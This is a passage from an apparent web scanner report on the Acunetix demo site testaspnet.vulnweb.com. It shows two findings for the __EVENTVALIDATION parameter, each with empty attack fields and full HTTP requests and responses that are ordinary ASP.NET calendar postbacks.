daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1099 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,099 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8414&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAmEfC9doIZGRkMtHRKW048AnH%2BZmVkLYIJZTNjJE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKEu7iDBAL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWrksxiux6VzzWI1lgFrT%2FRRSyWqA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:28 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAmEfC9doIZGRkMtHRKW048AnH+ZmVkLYIJZTNjJE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKEu7iDBAL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWrksxiux6VzzWI1lgFrT/RRSyWqA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:White" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8297&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAROXRmdoIZGRk1R1WUDsTMVvB1HtaCx2ji2qDjN4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKeueDOAQLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtGAX83QANsiq90jzOPhyplScnbl
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:41:02 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAROXRmdoIZGRk1R1WUDsTMVvB1HtaCx2ji2qDjN4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKeueDOAQLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtGAX83QANsiq90jzOPhyplScnbl" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:White" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged 